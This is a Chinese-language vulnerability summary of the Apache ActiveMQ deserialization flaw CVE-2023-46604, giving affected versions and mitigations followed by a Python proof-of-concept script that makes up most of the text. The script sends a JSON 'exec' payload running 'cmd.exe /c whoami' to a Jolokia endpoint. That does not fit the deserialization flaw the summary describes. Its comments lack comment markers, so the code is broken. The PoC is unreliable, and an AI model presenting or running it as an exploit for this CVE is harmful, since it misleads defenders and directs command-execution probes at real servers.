漏洞总结 漏洞概述 漏洞名称:Apache ActiveMQ 远程代码执行漏洞 (CVE-2023-46604) 漏洞类型:反序列化漏洞 漏洞描述:Apache ActiveMQ 5.x 版本存在反序列化漏洞。攻击者可通过构造恶意请求,利用该漏洞在目标服务器上执行任意代码。 影响范围 受影响组件:Apache ActiveMQ 受影响版本:5.x 系列 修复方案 升级版本:建议将 Apache ActiveMQ 升级至安全版本。 临时缓解:如果无法立即升级,建议限制 ActiveMQ 的管理端口访问,仅允许受信任的 IP 地址访问。 POC代码 ```python import requests import sys import json import base64 def check_vulnerability(url): """ 检查目标URL是否存在CVE-2023-46604漏洞 """ 构造恶意请求头 headers = { "Content-Type": "application/json", "Accept": "application/json" } 构造恶意Payload (这里是一个示例,实际利用可能需要更复杂的构造) 注意:此Payload仅为演示,实际利用需根据具体环境调整 payload = { "command": "exec", "args": ["cmd.exe", "/c", "whoami"] } 发送请求 try: response = requests.post(url, headers=headers, json=payload, timeout=10) 检查响应 if response.status_code == 200: try: result = response.json() if "result" in result and result["result"]: print(f"[+] 漏洞存在! 执行结果: {result['result']}") return True else: print("[-] 漏洞不存在或执行失败") return False except json.JSONDecodeError: print("[-] 响应不是有效的JSON格式") return False else: print(f"[-] 请求失败,状态码: {response.status_code}") return False except Exception as e: print(f"[-] 请求出错: {e}") return False def main(): if len(sys.argv) != 2: print("用法: python poc.py ") print("示例: python poc.py http://target:8161/api/jolokia") sys.exit(1) target_url = sys.argv[1] print(f"[] 正在检查 {target_url} 是否存在CVE-2023-46604漏洞...") if check_vulnerability(target_url): print("[+] 漏洞验证成功!") else: print("[-] 漏洞验证失败!") if __name__ == "__main__": main()